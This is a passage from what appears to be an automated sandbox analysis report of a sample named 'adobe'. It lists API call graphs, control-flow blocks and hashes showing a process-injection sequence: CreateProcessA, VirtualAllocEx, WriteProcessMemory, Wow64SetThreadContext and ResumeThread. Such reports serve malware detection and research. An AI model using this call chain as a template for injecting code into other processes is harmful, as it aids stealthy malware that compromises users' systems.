API calls 24952->24958 24959 2b1adbf 2 API calls 24952->24959 24960 2b1aa42 4 API calls 24952->24960 24961 2b1ae22 2 API calls 24952->24961 24962 2b1af67 4 API calls 24952->24962 24963 2b1aa66 4 API calls 24952->24963 24964 2b1ad26 4 API calls 24952->24964 24965 2b1aba9 4 API calls 24952->24965 24966 2b1aa88 4 API calls 24952->24966 24967 2b1a9ec 2 API calls 24952->24967 24968 2b1b06c 2 API calls 24952->24968 24969 2b1aecf 4 API calls 24952->24969 24953->24925 24954->24953 24955->24953 24956->24953 24957->24953 24958->24953 24959->24953 24960->24953 24961->24953 24962->24953 24963->24953 24964->24953 24965->24953 24966->24953 24967->24953 24968->24953 24969->24953 24971 2b1a514 24970->24971 24972 2b1a589 24970->24972 24973 2b1ac73 4 API calls 24971->24973 24974 2b1ab15 2 API calls 24971->24974 24975 2b1ae96 2 API calls 24971->24975 24976 2b1b1d8 4 API calls 24971->24976 24977 2b1ae5d 2 API calls 24971->24977 24978 2b1adbf 2 API calls 24971->24978 24979 2b1aa42 4 API calls 24971->24979 24980 2b1ae22 2 API calls 24971->24980 24981 2b1af67 4 API calls 24971->24981 24982 2b1aa66 4 API calls 24971->24982 24983 2b1ad26 4 API calls 24971->24983 24984 2b1aba9 4 API calls 24971->24984 24985 2b1aa88 4 API calls 24971->24985 24986 2b1a9ec 2 API calls 24971->24986 24987 2b1b06c 2 API calls 24971->24987 24988 2b1aecf 4 API calls 24971->24988 24989 2b1a542 24971->24989 24972->24925 24973->24989 24974->24989 24975->24989 24976->24989 24977->24989 24978->24989 24979->24989 24980->24989 24981->24989 24982->24989 24983->24989 24984->24989 24985->24989 24986->24989 24987->24989 24988->24989 24989->24925 24991 2b1a53a 24990->24991 24992 2b1a542 24991->24992 24993 2b1ac73 4 API calls 24991->24993 24994 2b1ab15 2 API calls 24991->24994 24995 2b1ae96 2 API calls 24991->24995 24996 2b1b1d8 4 API calls 24991->24996 24997 2b1ae5d 2 API calls 24991->24997 24998 2b1adbf 2 API calls 24991->24998 24999 2b1aa42 4 API calls 24991->24999 25000 2b1ae22 2 API calls 24991->25000 25001 2b1af67 4 API calls 24991->25001 25002 2b1aa66 4 API calls 24991->25002 25003 2b1ad26 4 API calls 24991->25003 25004 2b1aba9 4 API calls 24991->25004 25005 2b1aa88 4 API calls 24991->25005 25006 2b1a9ec 2 API calls 24991->25006 25007 2b1b06c 2 API calls 24991->25007 25008 2b1aecf 4 API calls 24991->25008 24992->24925 24993->24992 24994->24992 24995->24992 24996->24992 24997->24992 24998->24992 24999->24992 25000->24992 25001->24992 25002->24992 25003->24992 25004->24992 25005->24992 25006->24992 25007->24992 25008->24992 25104 2b19480 25009->25104 25108 2b19478 25009->25108 25010 2b1aa4e 25011 2b1b3ff 25010->25011 25012 2b19480 WriteProcessMemory 25010->25012 25013 2b19478 WriteProcessMemory 25010->25013 25112 2b193c0 25010->25112 25116 2b193b8 25010->25116 25011->24934 25012->25010 25013->25010 25019 2b1aa4e 25018->25019 25020 2b1b3ff 25019->25020 25021 2b19478 WriteProcessMemory 25019->25021 25022 2b19480 WriteProcessMemory 25019->25022 25023 2b193c0 VirtualAllocEx 25019->25023 25024 2b193b8 VirtualAllocEx 25019->25024 25020->24934 25021->25019 25022->25019 25023->25019 25024->25019 25027 2b1add6 25025->25027 25026 2b1b080 25027->25026 25120 2b18e00 25027->25120 25124 2b18df8 25027->25124 25128 2b19708 25030->25128 25132 2b196fc 25030->25132 25036 2b1aa4e 25034->25036 25035 2b1b3ff 25035->24934 25036->25035 25037 2b193c0 VirtualAllocEx 25036->25037 25038 2b193b8 VirtualAllocEx 25036->25038 25039 2b19480 WriteProcessMemory 25036->25039 25040 2b19478 WriteProcessMemory 25036->25040 25037->25036 25038->25036 25039->25036 25040->25036 25043 2b1aa4e 25041->25043 25042 2b1b3ff 25042->24934 25043->25042 25044 2b193c0 VirtualAllocEx 25043->25044 25045 2b193b8 VirtualAllocEx 25043->25045 25046 2b19480 WriteProcessMemory 25043->25046 25047 2b19478 WriteProcessMemory 25043->25047 25044->25043 25045->25043 25046->25043 25047->25043 25049 2b1aa4e 25048->25049 25050 2b1b3ff 25049->25050 25051 2b193c0 VirtualAllocEx 25049->25051 25052 2b193b8 VirtualAllocEx 25049->25052 25053 2b19480 WriteProcessMemory 25049->25053 25054 2b19478 WriteProcessMemory 25049->25054 25050->24934 25051->25049 25052->25049 25053->25049 25054->25049 25056 2b1aa4e 25055->25056 25057 2b1b3ff 25056->25057 25058 2b19480 WriteProcessMemory 25056->25058 25059 2b19478 WriteProcessMemory 25056->25059 25060 2b193c0 VirtualAllocEx 25056->25060 25061 2b193b8 VirtualAllocEx 25056->25061 25057->24934 25058->25056 25059->25056 25060->25056 25061->25056 25063 2b1aa4e 25062->25063 25064 2b1b291 25063->25064 25065 2b193c0 VirtualAllocEx 25063->25065 25066 2b193b8 VirtualAllocEx 25063->25066 25067 2b19480 WriteProcessMemory 25063->25067 25068 2b19478 WriteProcessMemory 25063->25068 25064->24934 25065->25063 25066->25063 25067->25063 25068->25063 25070 2b1b297 25069->25070 25136 2b19570 25070->25136 25140 2b19568 25070->25140 25071 2b1b2b9 25075 2b1aa4e 25074->25075 25076 2b1b3ff 25075->25076 25077 2b193c0 VirtualAllocEx 25075->25077 25078 2b193b8 VirtualAllocEx 25075->25078 25079 2b19480 WriteProcessMemory 25075->25079 25080 2b19478 WriteProcessMemory 25075->25080 25076->24934 25077->25075 25078->25075 25079->25075 25080->25075 25082 2b1adc5 25081->25082 25083 2b18e00 ResumeThread 25082->25083 25084 2b18df8 ResumeThread 25082->25084 25083->25082 25084->25082 25086 2b1add7 25085->25086 25087 2b18e00 ResumeThread 25086->25087 25088 2b18df8 ResumeThread 25086->25088 25087->25086 25088->25086 25091 2b1aa4e 25089->25091 25090 2b1b3ff 25090->24934 25091->25090 25092 2b19480 WriteProcessMemory 25091->25092 25093 2b19478 WriteProcessMemory 25091->25093 25094 2b193c0 VirtualAllocEx 25091->25094 25095 2b193b8 VirtualAllocEx 25091->25095 25092->25091 25093->25091 25094->25091 25095->25091 25144 2b18eb0 25096->25144 25148 2b18ea8 25096->25148 25097 2b1aeb0 25101 2b1ab1b 25100->25101 25102 2b18e00 ResumeThread 25101->25102 25103 2b18df8 ResumeThread 25101->25103 25102->25101 25103->25101 25105 2b19485 WriteProcessMemory 25104->25105 25107 2b1951f 25105->25107 25107->25010 25109 2b19480 WriteProcessMemory 25108->25109 25111 2b1951f 25109->25111 25111->25010 25113 2b193c5 VirtualAllocEx 25112->25113 25115 2b1943d 25113->25115 25115->25010 25117 2b193c0 VirtualAllocEx 25116->25117 25119 2b1943d 25117->25119 25119->25010 25121 2b18e05 ResumeThread 25120->25121 25123 2b18e71 25121->25123 25123->25027 25125 2b18e00 ResumeThread 25124->25125 25127 2b18e71 25125->25127 25127->25027 25129 2b1970d CreateProcessA 25128->25129 25131 2b19953 25129->25131 25133 2b19708 CreateProcessA 25132->25133 25135 2b19953 25133->25135 25135->25135 25137 2b19575 ReadProcessMemory 25136->25137 25139 2b195ff 25137->25139 25139->25071 25141 2b19570 ReadProcessMemory 25140->25141 25143 2b195ff 25141->25143 25143->25071 25145 2b18eb5 Wow64SetThreadContext 25144->25145 25147 2b18f3d 25145->25147 25147->25097 25149 2b18eb0 Wow64SetThreadContext 25148->25149 25151 2b18f3d 25149->25151 25151->25097 24874 127acb0 24875 127acbf 24874->24875 24878 127ada3 24874->24878 24886 127ada8 24874->24886 24879 127adb9 24878->24879 24880 127addc 24878->24880 24879->24880 24894 127b031 24879->24894 24898 127b040 24879->24898 24880->24875 24881 127afe0 GetModuleHandleW 24883 127b00d 24881->24883 24882 127add4 24882->24880 24882->24881 24883->24875 24887 127adb9 24886->24887 24888 127addc 24886->24888 24887->24888 24892 127b031 LoadLibraryExW 24887->24892 24893 127b040 LoadLibraryExW 24887->24893 24888->24875 24889 127add4 24889->24888 24890 127afe0 GetModuleHandleW 24889->24890 24891 127b00d 24890->24891 24891->24875 24892->24889 24893->24889 24896 127b040 24894->24896 24895 127b079 24895->24882 24896->24895 24902 127a130 24896->24902 24899 127b054 24898->24899 24900 127a130 LoadLibraryExW 24899->24900 24901 127b079 24899->24901 24900->24901 24901->24882 24903 127b220 LoadLibraryExW 24902->24903 24905 127b299 24903->24905 24905->24895 24914 127d040 24915 127d086 GetCurrentProcess 24914->24915 24917 127d0d1 24915->24917 24918 127d0d8 GetCurrentThread 24915->24918 24917->24918 24919 127d115 GetCurrentProcess 24918->24919 24920 127d10e 24918->24920 24921 127d14b GetCurrentThreadId 24919->24921 24920->24919 24923 127d1a4 24921->24923 25152 127d690 DuplicateHandle 25153 127d726 25152->25153

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 526 127d030-127d0cf GetCurrentProcess 530 127d0d1-127d0d7 526->530 531 127d0d8-127d10c GetCurrentThread 526->531 530->531 532 127d115-127d149 GetCurrentProcess 531->532 533 127d10e-127d114 531->533 534 127d152-127d16a 532->534 535 127d14b-127d151 532->535 533->532 539 127d173-127d1a2 GetCurrentThreadId 534->539 535->534 540 127d1a4-127d1aa 539->540 541 127d1ab-127d20d 539->541 540->541
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 0127D0BE
                        • GetCurrentThread.KERNEL32 ref: 0127D0FB
                        • GetCurrentProcess.KERNEL32 ref: 0127D138
                        • GetCurrentThreadId.KERNEL32 ref: 0127D191
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: a122e296c1f3c27fb2cb4b1a4a285c967c4132e0f44e24f4bcb4309cad23e952
                        • Instruction ID: ef9e73649e9065d8bac02d5acf42efdc769d5f1fb55d998c50e8a44477ccd1d0
                        • Opcode Fuzzy Hash: a122e296c1f3c27fb2cb4b1a4a285c967c4132e0f44e24f4bcb4309cad23e952
                        • Instruction Fuzzy Hash: BF5164B0900359CFDB14DFA9D948BDEBFF1AF88304F208599D419A72A0DB349989CB65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 547 127d040-127d0cf GetCurrentProcess 551 127d0d1-127d0d7 547->551 552 127d0d8-127d10c GetCurrentThread 547->552 551->552 553 127d115-127d149 GetCurrentProcess 552->553 554 127d10e-127d114 552->554 555 127d152-127d16a 553->555 556 127d14b-127d151 553->556 554->553 560 127d173-127d1a2 GetCurrentThreadId 555->560 556->555 561 127d1a4-127d1aa 560->561 562 127d1ab-127d20d 560->562 561->562
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 0127D0BE
                        • GetCurrentThread.KERNEL32 ref: 0127D0FB
                        • GetCurrentProcess.KERNEL32 ref: 0127D138
                        • GetCurrentThreadId.KERNEL32 ref: 0127D191
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: ebee54de538c63344487470d67cb66e505730ceff767bb807304138625cc73e5
                        • Instruction ID: 51e56584e9ab1aa5333ac211d30c0427ce3e9dcc7827f8c38927eed1582350b2
                        • Opcode Fuzzy Hash: ebee54de538c63344487470d67cb66e505730ceff767bb807304138625cc73e5
                        • Instruction Fuzzy Hash: 875154B0900349CFDB14DFAAD948BDEBBF1AF88304F208559E419A73A0DB349984CF65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 672 2b196fc-2b19706 673 2b19708-2b1970c 672->673 674 2b1970d-2b1979d 672->674 673->674 676 2b197d6-2b197f6 674->676 677 2b1979f-2b197a9 674->677 684 2b197f8-2b19802 676->684 685 2b1982f-2b1985e 676->685 677->676 678 2b197ab-2b197ad 677->678 679 2b197d0-2b197d3 678->679 680 2b197af-2b197b9 678->680 679->676 682 2b197bb 680->682 683 2b197bd-2b197cc 680->683 682->683 683->683 686 2b197ce 683->686 684->685 687 2b19804-2b19806 684->687 691 2b19860-2b1986a 685->691 692 2b19897-2b19951 CreateProcessA 685->692 686->679 689 2b19829-2b1982c 687->689 690 2b19808-2b19812 687->690 689->685 693 2b19814 690->693 694 2b19816-2b19825 690->694 691->692 695 2b1986c-2b1986e 691->695 705 2b19953-2b19959 692->705 706 2b1995a-2b199e0 692->706 693->694 694->694 696 2b19827 694->696 697 2b19891-2b19894 695->697 698 2b19870-2b1987a 695->698 696->689 697->692 700 2b1987c 698->700 701 2b1987e-2b1988d 698->701 700->701 701->701 702 2b1988f 701->702 702->697 705->706 716 2b199f0-2b199f4 706->716 717 2b199e2-2b199e6 706->717 719 2b19a04-2b19a08 716->719 720 2b199f6-2b199fa 716->720 717->716 718 2b199e8 717->718 718->716 722 2b19a18-2b19a1c 719->722 723 2b19a0a-2b19a0e 719->723 720->719 721 2b199fc 720->721 721->719 725 2b19a2e-2b19a35 722->725 726 2b19a1e-2b19a24 722->726 723->722 724 2b19a10 723->724 724->722 727 2b19a37-2b19a46 725->727 728 2b19a4c 725->728 726->725 727->728 730 2b19a4d 728->730 730->730
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02B1993E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 820e7bed3fba2cf05279baa82f2cbba283c1b0dc365180bae61066374a5e156e
                        • Instruction ID: 8c759cc6694918848b972620c42b47e61bea6232f44f64a1fd5f0f5939872c81
                        • Opcode Fuzzy Hash: 820e7bed3fba2cf05279baa82f2cbba283c1b0dc365180bae61066374a5e156e
                        • Instruction Fuzzy Hash: F9A19D71D00659CFEB10DFA8C8507EEBBB2FF48314F1485A9E849A7280DB749985CF92

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 731 2b19708-2b1979d 734 2b197d6-2b197f6 731->734 735 2b1979f-2b197a9 731->735 742 2b197f8-2b19802 734->742 743 2b1982f-2b1985e 734->743 735->734 736 2b197ab-2b197ad 735->736 737 2b197d0-2b197d3 736->737 738 2b197af-2b197b9 736->738 737->734 740 2b197bb 738->740 741 2b197bd-2b197cc 738->741 740->741 741->741 744 2b197ce 741->744 742->743 745 2b19804-2b19806 742->745 749 2b19860-2b1986a 743->749 750 2b19897-2b19951 CreateProcessA 743->750 744->737 747 2b19829-2b1982c 745->747 748 2b19808-2b19812 745->748 747->743 751 2b19814 748->751 752 2b19816-2b19825 748->752 749->750 753 2b1986c-2b1986e 749->753 763 2b19953-2b19959 750->763 764 2b1995a-2b199e0 750->764 751->752 752->752 754 2b19827 752->754 755 2b19891-2b19894 753->755 756 2b19870-2b1987a 753->756 754->747 755->750 758 2b1987c 756->758 759 2b1987e-2b1988d 756->759 758->759 759->759 760 2b1988f 759->760 760->755 763->764 774 2b199f0-2b199f4 764->774 775 2b199e2-2b199e6 764->775 777 2b19a04-2b19a08 774->777 778 2b199f6-2b199fa 774->778 775->774 776 2b199e8 775->776 776->774 780 2b19a18-2b19a1c 777->780 781 2b19a0a-2b19a0e 777->781 778->777 779 2b199fc 778->779 779->777 783 2b19a2e-2b19a35 780->783 784 2b19a1e-2b19a24 780->784 781->780 782 2b19a10 781->782 782->780 785 2b19a37-2b19a46 783->785 786 2b19a4c 783->786 784->783 785->786 788 2b19a4d 786->788 788->788
                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02B1993E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 40c5d21b7c47cd1b7730a97cc88c6a8071767c628d229a5ba2dd799eb87b7aa4
                        • Instruction ID: 770b647e2e2336f5b37706f5230af17a1ef1b492ca9b2b1072f081b29b8e53ae
                        • Opcode Fuzzy Hash: 40c5d21b7c47cd1b7730a97cc88c6a8071767c628d229a5ba2dd799eb87b7aa4
                        • Instruction Fuzzy Hash: D7919D71D00659CFDB14DFA8C8507EEBBB2FF48314F1481A9E859A7280DB749985CF92

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 789 127ada8-127adb7 790 127ade3-127ade7 789->790 791 127adb9-127adc6 call 127a0cc 789->791 792 127adfb-127ae3c 790->792 793 127ade9-127adf3 790->793 796 127addc 791->796 797 127adc8 791->797 800 127ae3e-127ae46 792->800 801 127ae49-127ae57 792->801 793->792 796->790 847 127adce call 127b031 797->847 848 127adce call 127b040 797->848 800->801 803 127ae7b-127ae7d 801->803 804 127ae59-127ae5e 801->804 802 127add4-127add6 802->796 806 127af18-127af94 802->806 805 127ae80-127ae87 803->805 807 127ae60-127ae67 call 127a0d8 804->807 808 127ae69 804->808 810 127ae94-127ae9b 805->810 811 127ae89-127ae91 805->811 839 127af96-127afbe 806->839 840 127afc0-127afd8 806->840 812 127ae6b-127ae79 807->812 808->812 814 127ae9d-127aea5 810->814 815 127aea8-127aeaa call 127a0e8 810->815 811->810 812->805 814->815 819 127aeaf-127aeb1 815->819 820 127aeb3-127aebb 819->820 821 127aebe-127aec3 819->821 820->821 823 127aec5-127aecc 821->823 824 127aee1-127aeee 821->824 823->824 825 127aece-127aede call 127a0f8 call 127a108 823->825 829 127af11-127af17 824->829 830 127aef0-127af0e 824->830 825->824 830->829 839->840 842 127afe0-127b00b GetModuleHandleW 840->842 843 127afda-127afdd 840->843 844 127b014-127b028 842->844 845 127b00d-127b013 842->845 843->842 845->844 847->802 848->802
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0127AFFE
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: d00a7257f45a517b72275b4debda7e69f7b049f6fa521e7472d687bdb5b00921
                        • Instruction ID: 7ddbe16e5f61a0243071333f5e14748e31dd0f762d37b95a8939ddc57c8c194d
                        • Opcode Fuzzy Hash: d00a7257f45a517b72275b4debda7e69f7b049f6fa521e7472d687bdb5b00921
                        • Instruction Fuzzy Hash: 43814470A10B068FD724DF2AC0447ABBBF1FF88314F048A2DD18A97A51D775E94ACB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 849 127590d-1275916 850 1275918-12759d9 CreateActCtxA 849->850 852 12759e2-1275a3c 850->852 853 12759db-12759e1 850->853 860 1275a3e-1275a41 852->860 861 1275a4b-1275a4f 852->861 853->852 860->861 862 1275a51-1275a5d 861->862 863 1275a60 861->863 862->863 865 1275a61 863->865 865->865
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 012759C9
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: b1ddbe74d2ff3c98c80855c50e89a1089745fa270399a6fbe27707baaee90960
                        • Instruction ID: 26d923e2eac2d6a3e01894d4cbe322b88f7a3830295c53f105425a7cd943f22f
                        • Opcode Fuzzy Hash: b1ddbe74d2ff3c98c80855c50e89a1089745fa270399a6fbe27707baaee90960
                        • Instruction Fuzzy Hash: DB41D3B0C1071DCBDB14DFAAC884ACEFBB5BF49304F24806AD409AB255DB756986CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 866 12744c4-12759d9 CreateActCtxA 869 12759e2-1275a3c 866->869 870 12759db-12759e1 866->870 877 1275a3e-1275a41 869->877 878 1275a4b-1275a4f 869->878 870->869 877->878 879 1275a51-1275a5d 878->879 880 1275a60 878->880 879->880 882 1275a61 880->882 882->882
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 012759C9
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 446d7c82e7ac2a7a646c474c674b9cc08346caecb95365f270af62aa8a679281
                        • Instruction ID: 8754892f77750ba9a531659b1420705a03e42601748e57eeb0ddd78bb733ff5d
                        • Opcode Fuzzy Hash: 446d7c82e7ac2a7a646c474c674b9cc08346caecb95365f270af62aa8a679281
                        • Instruction Fuzzy Hash: 6B41D4B0C1071DCBDB24DFAAC88479EFBB5BF45304F248069D409AB255DB756985CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 883 2b19478-2b1947e 884 2b19480-2b19484 883->884 885 2b19485-2b194ce 883->885 884->885 887 2b194d0-2b194dc 885->887 888 2b194de-2b1951d WriteProcessMemory 885->888 887->888 890 2b19526-2b19556 888->890 891 2b1951f-2b19525 888->891 891->890
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02B19510
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: a5630a3667caf03ef5effa43fae3e6ffd667bc393887971b557ba26a94e9d0b7
                        • Instruction ID: b4fa704d206f0819e3e0c9abe75ac24ba4874ebe3161d2df82b618a75adc34e6
                        • Opcode Fuzzy Hash: a5630a3667caf03ef5effa43fae3e6ffd667bc393887971b557ba26a94e9d0b7
                        • Instruction Fuzzy Hash: 202157B1900359DFCB10CFAAC885BEEBBF4FF48314F10842AE959A7241C7789955CBA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 895 2b19480-2b194ce 898 2b194d0-2b194dc 895->898 899 2b194de-2b1951d WriteProcessMemory 895->899 898->899 901 2b19526-2b19556 899->901 902 2b1951f-2b19525 899->902 902->901
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02B19510
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 036d920ab629bdecae9605a1cd547594a9843eeb0c8a3d1eeee07164652ea264
                        • Instruction ID: b329ef54b19244fee14db9b0fc4a1e190fce6a1d3644c4d1121e4fb4ea5d86c3
                        • Opcode Fuzzy Hash: 036d920ab629bdecae9605a1cd547594a9843eeb0c8a3d1eeee07164652ea264
                        • Instruction Fuzzy Hash: 712169B1900349DFCB10CFAAC881BDEBBF4FF48314F10842AE959A7240C7789944CBA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 906 2b18ea8-2b18eae 907 2b18eb0-2b18eb4 906->907 908 2b18eb5-2b18efb 906->908 907->908 910 2b18f0b-2b18f3b Wow64SetThreadContext 908->910 911 2b18efd-2b18f09 908->911 913 2b18f44-2b18f74 910->913 914 2b18f3d-2b18f43 910->914 911->910 914->913
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02B18F2E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 65560fa47470f1b7cef1b3b8dee029464dac297ee683c438b7323082f19a02ca
                        • Instruction ID: 4662b42f578fc049bbd8356e26d9bfc7b4d1e72a37f2be6430654c09be582b57
                        • Opcode Fuzzy Hash: 65560fa47470f1b7cef1b3b8dee029464dac297ee683c438b7323082f19a02ca
                        • Instruction Fuzzy Hash: 2B2139719002098FDB10DFAAC5857EEBBF5EF48314F54842AD459A7240C7789585CFA5
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02B195F0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 6cc6cf52576bc5ab8c3319353b3b3e0749612e77d17fccb513ce353bd5da33c2
                        • Instruction ID: 193fcc12ec28927073ab4f1de48f4df764819092a25b8d82fa334fe48f64ef89
                        • Opcode Fuzzy Hash: 6cc6cf52576bc5ab8c3319353b3b3e0749612e77d17fccb513ce353bd5da33c2
                        • Instruction Fuzzy Hash: 632148B1D003599FDB10DFAAC880AEEFBF5FF48320F50842AE959A7250C7349940CBA5
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02B195F0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 2a4bb9371b7184decdb1458e94643ab27d1f1cf59589f4cfa04796ae6d0094b9
                        • Instruction ID: 4c598690c1499c94396c24d690d96e605e1eab2a6d2944079751782c51f8c0b0
                        • Opcode Fuzzy Hash: 2a4bb9371b7184decdb1458e94643ab27d1f1cf59589f4cfa04796ae6d0094b9
                        • Instruction Fuzzy Hash: A62139B1D003599FDB10DFAAC880AEEFBF5FF48320F508429E559A7250C7749944CBA5
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02B18F2E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: df1847967318bdb4fe82b52196c8d70da2361929a78c0d1baca851425c9473c0
                        • Instruction ID: cf0a86219cd54d2020701cead8e1d3e43e181f2322f467c8aade256c07cd9db2
                        • Opcode Fuzzy Hash: df1847967318bdb4fe82b52196c8d70da2361929a78c0d1baca851425c9473c0
                        • Instruction Fuzzy Hash: 9E2129B19003098FDB10DFAAC4857EEBBF5FF88324F54842AD459A7240C7789985CFA5
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0127D717
                        Memory Dump Source
                        • Source File: 00000006.00000002.1871782609.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1270000_adobe.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 91fe663f67c0fe2ab49aa7fbfa251ca76194bfec7d4276a0a85ffb9490666839
                        • Instruction ID: cd53b7227aaad9671b4d9518ec35628a7185b1a5957d92c2a5ba149f2e87781e
                        • Opcode Fuzzy Hash: 91fe663f67c0fe2ab49aa7fbfa251ca76194bfec7d4276a0a85ffb9490666839
                        • Instruction Fuzzy Hash: 3621E2B5900249DFDB10CFAAD984ADEFFF8EB48320F14841AE958A3310C375A940CFA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02B1942E
                        Memory Dump Source
                        • Source File: 00000006.00000002.1873000459.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_2b10000_adobe.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: cbae0996a07925d641edcbfe398eb6dd0c8e25073a616bad19748e0caf48b716
                        • Instruction ID: e5f60c8016e1aa91b0d7590e61f3afb329038d4c78f87cde7a2c23cadf4034bc
                        • Opcode Fuzzy Hash: cbae0996a07925d641edcbfe398eb6dd0c8e25073a616bad19748e0caf48b716
